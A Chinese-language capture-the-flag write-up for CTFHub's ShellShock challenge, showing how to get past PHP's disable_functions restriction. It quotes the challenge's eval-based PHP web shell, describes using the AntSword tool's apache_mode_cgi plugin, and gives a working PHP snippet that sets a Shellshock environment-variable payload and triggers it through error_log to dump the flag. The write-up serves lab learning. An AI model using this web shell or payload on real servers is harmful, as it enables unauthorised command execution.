ctfhub-web进阶-shellshock

ctfhub-web进阶-shellshock
题目描述:

利用PHP破壳完成 Bypass

CTFHub Bypass disable_function —— ShellShock
本环境来源于AntSword-Labs

<!DOCTYPE html>
<html>
<head>
    <title>CTFHub Bypass disable_function —— ShellShock</title>
    <meta charset="UTF-8">
</head>
<body>
<h1>CTFHub Bypass disable_function —— ShellShock</h1>
<p>本环境来源于<a href="https://github.com/AntSwordProject/AntSword-Labs">AntSword-Labs</a></p>
</body>
</html>
<?php
@eval($_REQUEST['ant']);
show_source(__FILE__);
?>

蚁剑连接后,发现只能点击网站根目录下的东西,其他的文件以及目录都没有权限,这时可以试试蚁剑的插件,发现有个apache_mode_cgi的模式可以利用

(主要是自己没有直接在虚拟终端试成功,但很多师傅说蚁剑是直接集成了shellshock的环境,可以不需要其他操作就只需要在虚拟终端中输命令就行了,所以可能是我自己的操作有问题,大家可以试试直接在虚拟终端上进行命令执行)

ctfhub-web进阶-shellshock_第1张图片
然后在使用了apache_mode_cgi后,可以在终端上进行命令执行:
ctfhub-web进阶-shellshock_第2张图片
第二种方法:
利用脚本去进行shellshock

在编写脚本之前,得先知道个东西,就是在一般情况下,系统里面的shell进程是有严格的权限控制的,但在bash运行过程中,它会调用操作系统的环境变量,所以我们可以通过设置环境变量来执行任意bash命令


putenv("PHP_hack=() { :; }; tac /flag > /var/www/html/hack.php");
error_log("",1,"","");
?>

将这串代码上传到网站目录下,然后访问hack.php,最后查看根目录下的hack.php即可:
ctfhub-web进阶-shellshock_第3张图片

你可能感兴趣的:(#,CTFHUB,linux,shell)